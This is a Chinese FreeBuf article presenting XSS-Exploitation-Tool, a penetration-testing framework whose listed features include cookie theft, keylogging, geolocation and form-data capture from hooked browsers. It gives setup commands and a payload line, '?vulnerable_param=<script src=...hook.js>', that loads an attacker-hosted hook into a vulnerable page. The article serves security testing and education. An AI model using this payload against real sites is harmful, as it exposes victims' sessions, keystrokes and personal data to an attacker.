XSS-Exploitation-Tool:一款功能强大的XSS漏洞扫描与利用工具
本文由
创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
关于XSS-Exploitation-Tool
XSS-Exploitation-Tool是一款功能强大的XSS漏洞扫描与利用工具,该工具专为渗透测试人员设计,可以帮助广大安全研究人员以快速的方式识别并利用跨站脚本XSS漏洞。
需要注意的是,该工具仅出于教育目的设计和开发,请不要将其用于真实环境。
功能介绍
1、支持获取关于目标浏览器的技术数据;
2、支持获取目标用户的地理坐标位置;
3、支持获取已挂起/已访问的网页快照;
4、支持获取已挂起/已访问的网页源代码;
5、支持提取表单输入字段数据;
6、支持获取Cookie数据;
7、键盘记录功能;
8、显示警告弹窗;
9、重定向用户;
工具安装
当前版本的XSS-Exploitation-Tool已在Debian 11上进行过测试。
在使用该工具之前,你还需要安装Apache、MySQL数据库和PHP相关模块:
$ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom $ sudo rm /var/www/index.html
接下来,广大研究人员可以直接使用下列命令将该项目源码克隆至本地:
$ sudo apt-get install git $ cd /tmp $ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git $ sudo mv XSS-Exploitation-Tool/* /var/www/html/
然后安装composer,并安装该工具所需的其他依赖组件:
$ sudo apt-get install composer $ cd /var/www/html/ $ sudo chown -R $your_debian_user:$your_debian_user /var/www/ $ composer install $ sudo chown -R www-data:$www-data /var/www/
安装完成后,使用下列命令初始化数据库:
$ sudo mysql
然后使用指定的权限创建一个新的用户:
MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet'; Query OK, 0 rows affected (0.00 sec) MariaDB [(none)]> flush privileges; Query OK, 0 rows affected (0.00 sec) MariaDB [(none)]> quit Bye
创建好数据库之后,访问下列地址即可:
http://server-ip/reset_database.php
调整JavaScript钩子文件
hook.js是一个钩子,我们需要使用服务器端的IP地址替换文件中的第一行数据:
var address = "your server ip";
工具使用
首先,我们需要创建一个页面来插入JavaScript钩子文件:
?vulnerable_param=<script src="http://your_server_ip/hook.js"/>
然后,当目标用户访问这个设置了钩子文件的页面之后,工具的服务器端则会列出目标浏览器列表。
工具运行截图
许可证协议
本项目的开发与发布遵循GPL-3.0开源许可证协议。
项目地址
XSS-Exploitation-Tool:【GitHub传送门】
参考资料
https://sharpforce.gitbook.io/cybersecurity/mes-projets/xss-exploitation-tool
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
文章目录